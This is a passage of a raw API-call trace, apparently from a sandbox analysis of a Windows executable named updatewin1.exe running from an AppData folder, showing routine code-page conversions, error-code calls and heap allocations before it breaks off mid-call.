WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¸X\x99\x84\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0164.217] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0164.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ") returned 256 [0164.217] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0164.217] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0164.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¸X\x99\x84\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0164.217] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe")) returned 0x5f [0164.217] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.217] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.217] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.217] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.218] SetLastError (dwErrCode=0x0) [0164.218] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.219] GetLastError () returned 0x0 [0164.219] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.220] SetLastError (dwErrCode=0x0) [0164.220] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.221] SetLastError (dwErrCode=0x0) [0164.221] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.222] GetLastError () returned 0x0 [0164.222] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.223] SetLastError (dwErrCode=0x0) [0164.223] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.224] GetLastError () returned 0x0 [0164.224] SetLastError (dwErrCode=0x0) [0164.225] GetLastError () returned 0x0 [0164.225] SetLastError (dwErrCode=0x0) [0164.225] GetLastError () returned 0x0 [0164.225] SetLastError (dwErrCode=0x0) [0164.225] GetLastError () returned 0x0 [0164.225] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] GetLastError () returned 0x0 [0164.226] SetLastError (dwErrCode=0x0) [0164.226] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x68) returned 0x381990 [0164.226] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.227] SetLastError (dwErrCode=0x0) [0164.227] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.228] SetLastError (dwErrCode=0x0) [0164.228] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.229] SetLastError (dwErrCode=0x0) [0164.229] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.230] GetLastError () returned 0x0 [0164.230] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.231] GetLastError () returned 0x0 [0164.231] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.232] GetLastError () returned 0x0 [0164.232] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.233] SetLastError (dwErrCode=0x0) [0164.233] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.234] SetLastError (dwErrCode=0x0) [0164.234] GetLastError () returned 0x0 [0164.235] SetLastError (dwErrCode=0x0) [0164.235] GetLastError () returned 0x0 [0164.235] SetLastError (dwErrCode=0x0) [0164.235] GetLastError () returned 0x0 [0164.235] SetLastError (dwErrCode=0x0) [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x98) returned 0x381a00 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1f) returned 0x381aa0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x36) returned 0x381ac8 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x37) returned 0x381b08 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x3c) returned 0x381b48 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x31) returned 0x381b90 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x17) returned 0x381bd0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x24) returned 0x381bf0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x381c20 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xd) returned 0x381c40 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x25) returned 0x381c58 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x39) returned 0x381c88 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x18) returned 0x381cd0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x17) returned 0x381cf0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xe) returned 0x381d10 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x69) returned 0x381d28 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x3e) returned 0x381da0 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1b) returned 0x381de8 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1d) returned 0x381e10 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x48) returned 0x381e38 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x381e88 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x18) returned 0x381ea8 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1b) returned 0x381ec8 [0164.235] RtlAllocateHeap (HeapHandle=0x380000, 